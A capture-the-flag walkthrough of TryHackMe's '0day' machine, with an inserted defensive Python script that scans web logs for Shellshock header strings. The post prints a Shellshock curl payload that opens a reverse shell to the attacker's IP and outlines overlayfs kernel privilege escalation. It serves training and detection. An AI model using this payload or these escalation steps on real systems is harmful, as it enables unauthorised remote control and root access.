0day Tryhackme Walkthrough

Akshay Shinde
4 min read · Oct 24, 2020

Exploit Ubuntu, like a Turtle in a Hurricane

0day is an intermediate boot2root machine on TryHackMe, and I found this machine very interesting to exploit.

This machine covers a very important vulnerability, and you will find it very easy to exploit.

Let's start off by scanning and enumerating the ports using Nmap.

Nmap scan results

Ok, so we have port 80 open, and we can proceed further with web enumeration using dirb and nikto.

Let's see what we got from dirb using common.txt as the default wordlist.

Dirb scan results

We have a lot of directories to go through. I found something very strange while going through the backup directory.

I mean, I got access to an SSH private key. That's huge, but later, when I tried getting into the machine using SSH, it turned out to be foul play :(

Just a foul play :(

After some time the nikto scan completed and found this vulnerability in /cgi-bin/test.cgi.

Nikto scan showing the website vulnerable to shellshock

In case you haven't heard what Shellshock is and how it works, here's a short explanation from my side.

Shellshock is a security bug that causes Bash to execute commands from environment variables unintentionally. If exploited, it allows an attacker to issue commands on the server remotely, also known as Remote Code Execution.

Because Bash does not properly sanitize environment variables before interpreting them (it keeps parsing past the end of an exported function definition and runs whatever follows it), an attacker can pretty much take over the entire system using the Shellshock vulnerability.

It was discovered by Stéphane Chazelas and was assigned the CVE identifier CVE-2014-6271. We will move forward by exploiting it manually rather than using Metasploit.
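From the defender's side, the same "() {" function prefix that Bash misparses is also the simplest thing to look for in web-server logs, because a CGI server exports headers like User-Agent and Referer straight into the script's environment. The following script is an added example of mine, not part of the original walkthrough; it parses Apache "combined" format log lines (the sample lines are constructed, not taken from the room) and reports every request whose Referer or User-Agent begins with the Shellshock trigger.

```python
import re

# Apache "combined" log line: Referer and User-Agent are the last two quoted
# fields, and a CGI server exports both to the script as environment variables.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# CVE-2014-6271 trigger: a value that begins with Bash's exported-function
# prefix "() {". Anchoring at the start avoids flagging the string mid-text.
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')

# Constructed sample log (not from the room): two injection attempts, one benign
# request, and one decoy that only contains "() {" in the middle of the value.
SAMPLE_LOG = """\
10.9.81.62 - - [24/Oct/2020:10:01:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :;}; echo; echo; id"
10.9.81.62 - - [24/Oct/2020:10:01:05 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "() { :; }; /bin/true" "curl/7.68.0"
192.168.1.10 - - [24/Oct/2020:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.11 - - [24/Oct/2020:10:02:30 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 () { not really"
"""


def parse_combined(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text):
    """Return one dict per header value that carries the "() {" prefix, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue  # skip lines that are not in combined format
        for field in ("referer", "user_agent"):
            if SHELLSHOCK_RE.match(rec[field]):
                hits.append({"ip": rec["ip"], "target": rec["target"],
                             "field": field, "value": rec[field]})
    return hits


if __name__ == "__main__":
    for h in find_shellshock(SAMPLE_LOG):
        print(f'{h["ip"]} -> {h["target"]} via {h["field"]}: {h["value"]!r}')
```

Any other header the CGI layer exports (Cookie, custom headers) is an equally valid vector, so in practice extend the field list to whatever your log format records.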

Exploiting Shellshock manually:

Shellshock Example

This is the basic method to check whether the server is vulnerable to Shellshock. Instead of the generic example, we use our own machine's IP and the path to the vulnerable CGI script and see whether we get anything back from the server.

Ok, so it is vulnerable, and we can exploit it by injecting a reverse shell and listening for the incoming connection.

curl -H 'User-Agent: () { :;}; echo; echo; /bin/bash -i >& /dev/tcp/10.9.81.62/1234 0>&1' bash -s : '' http://10.10.226.13/cgi-bin/test.cgi

This is the payload that we will be using to get the reverse connection.

Reverse connection

We got user.txt and are just left with the privilege escalation.

user.txt

I searched around for a bit and did not get anything from it. So I fired up linpeas.sh and found that there's a gcc compiler present on the machine.

Ok, so let's check the kernel version using uname and see if we can find any kernel exploits.

Kernel version exploits

We got it, the overlayfs exploit :)

Uploading the exploit
Compiling the exploit

As you can see, gcc is not able to find cc1, and that's the reason it is not compiling. Maybe it's caused by the PATH variable.

I looked at the hint for this room: "This is a very old operating system you've got here, isn't it?.."

We have to change the PATH variable to get things in line. Follow me…

export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin

Compiled successfully

Cool, now just run the binary and enjoy root :))

root.txt

There's another method that I found out about from the TryHackMe Discord channel: we can compile the exploit on our own machine and then transfer it to the victim's machine. It works perfectly 😉

Compiling on our machine
Transferring and running the binary

Hope to see you guys soon 😄 Happy Hacking 💻

Akshay Shinde

Security Research @AppKnox | CEH(P) | CRTP | eCPPTv2 | RASTALABS